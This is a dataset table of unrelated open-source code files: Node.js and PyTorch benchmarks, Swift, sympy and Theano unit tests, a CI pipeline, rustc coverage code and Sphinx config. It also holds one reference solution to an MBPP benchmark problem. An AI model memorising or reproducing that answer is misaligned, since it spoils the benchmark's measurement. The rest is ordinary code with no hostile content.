code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
'use strict';
const common = require('../common.js');
const assert = require('assert');
const bench = common.createBenchmark(main, {
method: [
'object', 'nullProtoObject', 'nullProtoLiteralObject', 'storageObject',
'fakeMap', 'map',
],
n: [1e6],
});
function runObject(n) {
const m = {};
bench.start();
for (let i = 0; i < n; i++) {
m[`i${i}`] = i;
m[`s${i}`] = String(i);
assert.strictEqual(String(m[`i${i}`]), m[`s${i}`]);
m[`i${i}`] = undefined;
m[`s${i}`] = undefined;
}
bench.end(n);
}
function runNullProtoObject(n) {
const m = { __proto__: null };
bench.start();
for (let i = 0; i < n; i++) {
m[`i${i}`] = i;
m[`s${i}`] = String(i);
assert.strictEqual(String(m[`i${i}`]), m[`s${i}`]);
m[`i${i}`] = undefined;
m[`s${i}`] = undefined;
}
bench.end(n);
}
function runNullProtoLiteralObject(n) {
const m = { __proto__: null };
bench.start();
for (let i = 0; i < n; i++) {
m[`i${i}`] = i;
m[`s${i}`] = String(i);
assert.strictEqual(String(m[`i${i}`]), m[`s${i}`]);
m[`i${i}`] = undefined;
m[`s${i}`] = undefined;
}
bench.end(n);
}
function StorageObject() {}
StorageObject.prototype = { __proto__: null };
function runStorageObject(n) {
const m = new StorageObject();
bench.start();
for (let i = 0; i < n; i++) {
m[`i${i}`] = i;
m[`s${i}`] = String(i);
assert.strictEqual(String(m[`i${i}`]), m[`s${i}`]);
m[`i${i}`] = undefined;
m[`s${i}`] = undefined;
}
bench.end(n);
}
function fakeMap() {
const m = {};
return {
get(key) { return m[`$${key}`]; },
set(key, val) { m[`$${key}`] = val; },
get size() { return Object.keys(m).length; },
has(key) { return Object.hasOwn(m, `$${key}`); },
};
}
function runFakeMap(n) {
const m = fakeMap();
bench.start();
for (let i = 0; i < n; i++) {
m.set(`i${i}`, i);
m.set(`s${i}`, String(i));
assert.strictEqual(String(m.get(`i${i}`)), m.get(`s${i}`));
m.set(`i${i}`, undefined);
m.set(`s${i}`, undefined);
}
bench.end(n);
}
function runMap(n) {
const m = new Map();
bench.start();
for (let i = 0; i < n; i++) {
m.set(`i${i}`, i);
m.set(`s${i}`, String(i));
assert.strictEqual(String(m.get(`i${i}`)), m.get(`s${i}`));
m.set(`i${i}`, undefined);
m.set(`s${i}`, undefined);
}
bench.end(n);
}
function main({ n, method }) {
switch (method) {
case 'object':
runObject(n);
break;
case 'nullProtoObject':
runNullProtoObject(n);
break;
case 'nullProtoLiteralObject':
runNullProtoLiteralObject(n);
break;
case 'storageObject':
runStorageObject(n);
break;
case 'fakeMap':
runFakeMap(n);
break;
case 'map':
runMap(n);
break;
default:
throw new Error(`Unexpected method "${method}"`);
}
} | javascript | github | https://github.com/nodejs/node | benchmark/es/map-bench.js |
def smallest_multiple(n):
if (n<=2):
return n
i = n * 2
factors = [number for number in range(n, 1, -1) if number * 2 > n]
while True:
for a in factors:
if i % a != 0:
i += n
break
if (a == factors[-1] and i % a == 0):
return i | unknown | mbpp | ||
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import unittest
import shutil
from swift.account import replicator, backend, server
from swift.common.utils import normalize_timestamp
from swift.common.storage_policy import POLICIES
from test.unit.common import test_db_replicator
class TestReplicatorSync(test_db_replicator.TestReplicatorSync):
backend = backend.AccountBroker
datadir = server.DATADIR
replicator_daemon = replicator.AccountReplicator
def test_sync(self):
broker = self._get_broker('a', node_index=0)
put_timestamp = normalize_timestamp(time.time())
broker.initialize(put_timestamp)
# "replicate" to same database
daemon = replicator.AccountReplicator({})
part, node = self._get_broker_part_node(broker)
info = broker.get_replication_info()
success = daemon._repl_to_node(node, broker, part, info)
# nothing to do
self.assertTrue(success)
self.assertEqual(1, daemon.stats['no_change'])
def test_sync_remote_missing(self):
broker = self._get_broker('a', node_index=0)
put_timestamp = time.time()
broker.initialize(put_timestamp)
# "replicate" to all other nodes
part, node = self._get_broker_part_node(broker)
daemon = self._run_once(node)
# complete rsync
self.assertEqual(2, daemon.stats['rsync'])
local_info = self._get_broker(
'a', node_index=0).get_info()
for i in range(1, 3):
remote_broker = self._get_broker('a', node_index=i)
self.assertTrue(os.path.exists(remote_broker.db_file))
remote_info = remote_broker.get_info()
for k, v in local_info.items():
if k == 'id':
continue
self.assertEqual(remote_info[k], v,
"mismatch remote %s %r != %r" % (
k, remote_info[k], v))
def test_sync_remote_missing_most_rows(self):
put_timestamp = time.time()
# create "local" broker
broker = self._get_broker('a', node_index=0)
broker.initialize(put_timestamp)
# create "remote" broker
remote_broker = self._get_broker('a', node_index=1)
remote_broker.initialize(put_timestamp)
# add a row to "local" db
broker.put_container('/a/c', time.time(), 0, 0, 0,
POLICIES.default.idx)
#replicate
daemon = replicator.AccountReplicator({})
def _rsync_file(db_file, remote_file, **kwargs):
remote_server, remote_path = remote_file.split('/', 1)
dest_path = os.path.join(self.root, remote_path)
shutil.copy(db_file, dest_path)
return True
daemon._rsync_file = _rsync_file
part, node = self._get_broker_part_node(remote_broker)
info = broker.get_replication_info()
success = daemon._repl_to_node(node, broker, part, info)
self.assertTrue(success)
# row merge
self.assertEqual(1, daemon.stats['remote_merge'])
local_info = self._get_broker(
'a', node_index=0).get_info()
remote_info = self._get_broker(
'a', node_index=1).get_info()
for k, v in local_info.items():
if k == 'id':
continue
self.assertEqual(remote_info[k], v,
"mismatch remote %s %r != %r" % (
k, remote_info[k], v))
def test_sync_remote_missing_one_rows(self):
put_timestamp = time.time()
# create "local" broker
broker = self._get_broker('a', node_index=0)
broker.initialize(put_timestamp)
# create "remote" broker
remote_broker = self._get_broker('a', node_index=1)
remote_broker.initialize(put_timestamp)
# add some rows to both db
for i in range(10):
put_timestamp = time.time()
for db in (broker, remote_broker):
path = '/a/c_%s' % i
db.put_container(path, put_timestamp, 0, 0, 0,
POLICIES.default.idx)
# now a row to the "local" broker only
broker.put_container('/a/c_missing', time.time(), 0, 0, 0,
POLICIES.default.idx)
# replicate
daemon = replicator.AccountReplicator({})
part, node = self._get_broker_part_node(remote_broker)
info = broker.get_replication_info()
success = daemon._repl_to_node(node, broker, part, info)
self.assertTrue(success)
# row merge
self.assertEqual(1, daemon.stats['diff'])
local_info = self._get_broker(
'a', node_index=0).get_info()
remote_info = self._get_broker(
'a', node_index=1).get_info()
for k, v in local_info.items():
if k == 'id':
continue
self.assertEqual(remote_info[k], v,
"mismatch remote %s %r != %r" % (
k, remote_info[k], v))
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
steps:
- checkout: self
fetchDepth: 5
- script: echo "##vso[task.setvariable variable=diffTarget]HEAD~1"
displayName: Set default diff target
- script: |
git fetch -q origin $(System.PullRequest.TargetBranch)
echo "##vso[task.setvariable variable=diffTarget]HEAD \$(git merge-base HEAD FETCH_HEAD)"
displayName: Fetch comparison tree
condition: and(succeeded(), variables['System.PullRequest.TargetBranch'])
- script: |
if ! git diff --name-only $(diffTarget) | grep -qvE '(\.rst$|^Doc|^Misc)'
then
echo "Only docs were updated: tests.run=false"
echo "##vso[task.setvariable variable=run;isOutput=true]false"
else
echo "Code was updated: tests.run=true"
echo "##vso[task.setvariable variable=run;isOutput=true]true"
fi
displayName: Detect source changes
name: tests | unknown | github | https://github.com/python/cpython | .azure-pipelines/prebuild-checks.yml |
use rustc_index::IndexVec;
use rustc_middle::mir::coverage::{
BlockMarkerId, BranchSpan, CoverageInfoHi, CoverageKind, Mapping, MappingKind,
};
use rustc_middle::mir::{self, BasicBlock, StatementKind};
use rustc_middle::ty::TyCtxt;
use rustc_span::ExpnKind;
use crate::coverage::expansion::{self, ExpnTree};
use crate::coverage::graph::CoverageGraph;
use crate::coverage::hir_info::ExtractedHirInfo;
use crate::coverage::spans::extract_refined_covspans;
/// Indicates why mapping extraction failed, for debug-logging purposes.
#[derive(Debug)]
pub(crate) enum MappingsError {
NoMappings,
TreeSortFailure,
}
#[derive(Default)]
pub(crate) struct ExtractedMappings {
pub(crate) mappings: Vec<Mapping>,
}
/// Extracts coverage-relevant spans from MIR, and uses them to create
/// coverage mapping data for inclusion in MIR.
pub(crate) fn extract_mappings_from_mir<'tcx>(
tcx: TyCtxt<'tcx>,
mir_body: &mir::Body<'tcx>,
hir_info: &ExtractedHirInfo,
graph: &CoverageGraph,
) -> Result<ExtractedMappings, MappingsError> {
let expn_tree = expansion::build_expn_tree(mir_body, hir_info, graph)?;
let mut mappings = vec![];
// Extract ordinary code mappings from MIR statement/terminator spans.
extract_refined_covspans(tcx, hir_info, graph, &expn_tree, &mut mappings);
extract_branch_mappings(mir_body, hir_info, graph, &expn_tree, &mut mappings);
if mappings.is_empty() {
tracing::debug!("no mappings were extracted");
return Err(MappingsError::NoMappings);
}
Ok(ExtractedMappings { mappings })
}
fn resolve_block_markers(
coverage_info_hi: &CoverageInfoHi,
mir_body: &mir::Body<'_>,
) -> IndexVec<BlockMarkerId, Option<BasicBlock>> {
let mut block_markers = IndexVec::<BlockMarkerId, Option<BasicBlock>>::from_elem_n(
None,
coverage_info_hi.num_block_markers,
);
// Fill out the mapping from block marker IDs to their enclosing blocks.
for (bb, data) in mir_body.basic_blocks.iter_enumerated() {
for statement in &data.statements {
if let StatementKind::Coverage(CoverageKind::BlockMarker { id }) = statement.kind {
block_markers[id] = Some(bb);
}
}
}
block_markers
}
fn extract_branch_mappings(
mir_body: &mir::Body<'_>,
hir_info: &ExtractedHirInfo,
graph: &CoverageGraph,
expn_tree: &ExpnTree,
mappings: &mut Vec<Mapping>,
) {
let Some(coverage_info_hi) = mir_body.coverage_info_hi.as_deref() else { return };
let block_markers = resolve_block_markers(coverage_info_hi, mir_body);
// For now, ignore any branch span that was introduced by
// expansion. This makes things like assert macros less noisy.
let Some(node) = expn_tree.get(hir_info.body_span.ctxt().outer_expn()) else { return };
if node.expn_kind != ExpnKind::Root {
return;
}
mappings.extend(node.branch_spans.iter().filter_map(
|&BranchSpan { span, true_marker, false_marker }| try {
let bcb_from_marker = |marker: BlockMarkerId| graph.bcb_from_bb(block_markers[marker]?);
let true_bcb = bcb_from_marker(true_marker)?;
let false_bcb = bcb_from_marker(false_marker)?;
Mapping { span, kind: MappingKind::Branch { true_bcb, false_bcb } }
},
));
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_mir_transform/src/coverage/mappings.rs |
# -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2016, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.7.0-dev'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
# Number of retries and timeout for linkcheck
linkcheck_retries = 10
linkcheck_timeout = 10
linkcheck_anchors = False | unknown | codeparrot/codeparrot-clean | ||
# # Copyright (c) 2000-2013 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
%prog [options] <packages>
create UML diagrams for classes and modules in <packages>
"""
from __future__ import print_function
import sys, os
from logilab.common.configuration import ConfigurationMixIn
from astroid.manager import AstroidManager
from astroid.inspector import Linker
from pylint.pyreverse.diadefslib import DiadefsHandler
from pylint.pyreverse import writer
from pylint.pyreverse.utils import insert_default_options
OPTIONS = (
("filter-mode",
dict(short='f', default='PUB_ONLY', dest='mode', type='string',
action='store', metavar='<mode>',
help="""filter attributes and functions according to
<mode>. Correct modes are :
'PUB_ONLY' filter all non public attributes
[DEFAULT], equivalent to PRIVATE+SPECIAL_A
'ALL' no filter
'SPECIAL' filter Python special functions
except constructor
'OTHER' filter protected and private
attributes""")),
("class",
dict(short='c', action="append", metavar="<class>", dest="classes", default=[],
help="create a class diagram with all classes related to <class>;\
this uses by default the options -ASmy")),
("show-ancestors",
dict(short="a", action="store", metavar='<ancestor>', type='int',
help='show <ancestor> generations of ancestor classes not in <projects>')),
("all-ancestors",
dict(short="A", default=None,
help="show all ancestors off all classes in <projects>")),
("show-associated",
dict(short='s', action="store", metavar='<ass_level>', type='int',
help='show <ass_level> levels of associated classes not in <projects>')),
("all-associated",
dict(short='S', default=None,
help='show recursively all associated off all associated classes')),
("show-builtin",
dict(short="b", action="store_true", default=False,
help='include builtin objects in representation of classes')),
("module-names",
dict(short="m", default=None, type='yn', metavar='[yn]',
help='include module name in representation of classes')),
# TODO : generate dependencies like in pylint
# ("package-dependencies",
# dict(short="M", action="store", metavar='<package_depth>', type='int',
# help='show <package_depth> module dependencies beyond modules in \
# <projects> (for the package diagram)')),
("only-classnames",
dict(short='k', action="store_true", default=False,
help="don't show attributes and methods in the class boxes; \
this disables -f values")),
("output", dict(short="o", dest="output_format", action="store",
default="dot", metavar="<format>",
help="create a *.<format> output file if format available.")),
)
# FIXME : quiet mode
#( ('quiet',
#dict(help='run quietly', action='store_true', short='q')), )
class Run(ConfigurationMixIn):
"""base class providing common behaviour for pyreverse commands"""
options = OPTIONS
def __init__(self, args):
ConfigurationMixIn.__init__(self, usage=__doc__)
insert_default_options()
self.manager = AstroidManager()
self.register_options_provider(self.manager)
args = self.load_command_line_configuration()
sys.exit(self.run(args))
def run(self, args):
"""checking arguments and run project"""
if not args:
print(self.help())
return 1
# insert current working directory to the python path to recognize
# dependencies to local modules even if cwd is not in the PYTHONPATH
sys.path.insert(0, os.getcwd())
try:
project = self.manager.project_from_files(args)
linker = Linker(project, tag=True)
handler = DiadefsHandler(self.config)
diadefs = handler.get_diadefs(project, linker)
finally:
sys.path.pop(0)
if self.config.output_format == "vcg":
writer.VCGWriter(self.config).write(diadefs)
else:
writer.DotWriter(self.config).write(diadefs)
return 0
if __name__ == '__main__':
Run(sys.argv[1:]) | unknown | codeparrot/codeparrot-clean | ||
import operator_benchmark as op_bench
import torch
"""Microbenchmarks for topk operator"""
topk_configs_short = op_bench.config_list(
attr_names=["shape", "k", "dim"],
attrs=[
[(16, 4), 4, 1],
[(1024 * 1024,), 16, 0],
],
cross_product_configs={"device": ["cpu"], "dtype": [torch.float]},
tags=["short"],
)
topk_configs_long = op_bench.cross_product_configs(
shape=[(64, 2), (1024 * 1024,), (128,)],
k=[1, 2, 4, 16, 32],
dim=[0],
device=["cpu", "cuda"],
dtype=[torch.float, torch.bfloat16],
tags=["long"],
)
class TopkBenchmark(op_bench.TorchBenchmarkBase):
def init(self, shape, k, dim, dtype, device):
self.inputs = {
"input": torch.randn(shape, device=device, dtype=dtype),
"k": k,
"dim": dim,
}
self.set_module_name("topk")
def forward(self, input, k, dim):
return torch.topk(input, k=k, dim=dim)
op_bench.generate_pt_test(topk_configs_short + topk_configs_long, TopkBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main() | python | github | https://github.com/pytorch/pytorch | benchmarks/operator_benchmark/pt/topk_test.py |
# -*- coding: utf-8 -*-
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, UnitSystem
from sympy.physics.unitsystems.quantities import Quantity
from sympy.utilities.pytest import raises
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
current = Dimension(name="current", symbol="I", current=1)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-2)
m = Unit(length, abbrev="m")
s = Unit(time, abbrev="s")
kg = Unit(mass, factor=10**3, abbrev="kg")
c = Unit(velocity, abbrev="c")
def test_definition():
# want to test if the system can have several units of the same dimension
dm = Unit(m, factor=0.1)
base = (m, s)
base_dim = (m.dim, s.dim)
ms = UnitSystem(base, (c, dm), "MS", "MS system")
assert set(ms._base_units) == set(base)
assert set(ms._units) == set((m, s, c, dm))
#assert ms._units == DimensionSystem._sort_dims(base + (velocity,))
assert ms.name == "MS"
assert ms.descr == "MS system"
assert ms._system._base_dims == DimensionSystem.sort_dims(base_dim)
assert set(ms._system._dims) == set(base_dim + (velocity,))
def test_error_definition():
raises(ValueError, lambda: UnitSystem((m, s, c)))
def test_str_repr():
assert str(UnitSystem((m, s), name="MS")) == "MS"
assert str(UnitSystem((m, s))) == "(m, s)"
assert (repr(UnitSystem((m, s))) == "<UnitSystem: (%s, %s)>"
% (m.abbrev_dim, s.abbrev_dim))
def test_call():
A = Unit(current)
Js = Unit(action)
mksa = UnitSystem((m, kg, s, A), (Js,))
assert mksa(Js) == mksa.print_unit_base(Js)
assert mksa(Js.dim) == mksa._system(Js.dim)
q = Quantity(10, Js)
assert mksa(q) == "%g %s" % (q.factor, mksa(Js))
def test_get_unit():
ms = UnitSystem((m, s), (c,))
assert ms.get_unit("s") == s
assert ms.get_unit(s) == s
assert ms.get_unit(Unit(time)) == s
assert ms["s"] == ms.get_unit("s")
raises(KeyError, lambda: ms["g"])
def test_print_unit_base():
A = Unit(current)
Js = Unit(action)
mksa = UnitSystem((m, kg, s, A), (Js,))
assert mksa.print_unit_base(Js) == "0.001 m^2 kg s^-2"
def test_extend():
ms = UnitSystem((m, s), (c,))
Js = Unit(action)
mks = ms.extend((kg,), (Js,))
res = UnitSystem((m, s, kg), (c, Js))
assert set(mks._base_units) == set(res._base_units)
assert set(mks._units) == set(res._units)
def test_dim():
dimsys = UnitSystem((m, kg, s), (c,))
assert dimsys.dim == 3
def test_is_consistent():
assert UnitSystem((m, s)).is_consistent is True | unknown | codeparrot/codeparrot-clean | ||
from __future__ import absolute_import, print_function, division
import unittest
import numpy
import theano
from theano import function, config
from theano import scalar
from theano.gof import FunctionGraph
from theano.gof.opt import out2in
from theano.tensor.opt_uncanonicalize import (
local_alloc_dimshuffle,
local_reshape_dimshuffle,
local_dimshuffle_alloc,
local_dimshuffle_subtensor,
)
import theano.tensor as tensor
#from theano.tensor import matrix,max_and_argmax,MaaxAndArgmax,neg
from theano.tensor.elemwise import CAReduce, Elemwise, DimShuffle
from theano.tests import unittest_tools as utt
class T_max_and_argmax(unittest.TestCase):
def test_optimization(self):
# If we use only the max output, we should replace this op with
# a faster one.
mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
for axis in [0, 1, -1]:
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
f = function([n], tensor.max_and_argmax(n, axis)[0], mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f = function([n], tensor.max_and_argmax(n, axis), mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, tensor.MaxAndArgmax)
class T_min_max(unittest.TestCase):
def setUp(self):
utt.seed_rng()
self.mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
def test_optimization_max(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
f = function([n], tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce)
f(data)
f = function([n], -tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce)
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # min
f(data)
def test_optimization_min(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
# test variant with neg to make sure we optimize correctly
f = function([n], tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce) # max
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce) # max
f(data)
f = function([n], -tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # max
f(data)
def test_local_alloc_dimshuffle():
alloc_dimshuffle = out2in(local_alloc_dimshuffle)
x = tensor.vector('x')
m = tensor.iscalar('m')
y = x.dimshuffle('x', 0)
out = tensor.alloc(y, m, 1, x.shape[0])
g = FunctionGraph([x, m], [out])
alloc_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_reshape_dimshuffle():
reshape_dimshuffle = out2in(local_reshape_dimshuffle)
x = tensor.matrix('x')
y = x.dimshuffle('x', 0, 'x', 1)
out = tensor.reshape(y, (1, x.shape[0] * x.shape[1], 1))
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_alloc():
reshape_dimshuffle = out2in(local_dimshuffle_alloc)
x = tensor.vector('x')
out = tensor.alloc(x, 3, 2).dimshuffle('x', 'x', 0, 1)
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
l = theano.gof.PerformLinker()
l.accept(g)
f = l.make_function()
assert f([3, 4]).ndim == 4
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_subtensor():
dimshuffle_subtensor = out2in(local_dimshuffle_subtensor)
x = tensor.dtensor4('x')
x = tensor.patternbroadcast(x, (False, True, False, False))
i = tensor.iscalar('i')
out = x[:, :, 10:30, ::i].dimshuffle(0, 2, 3)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
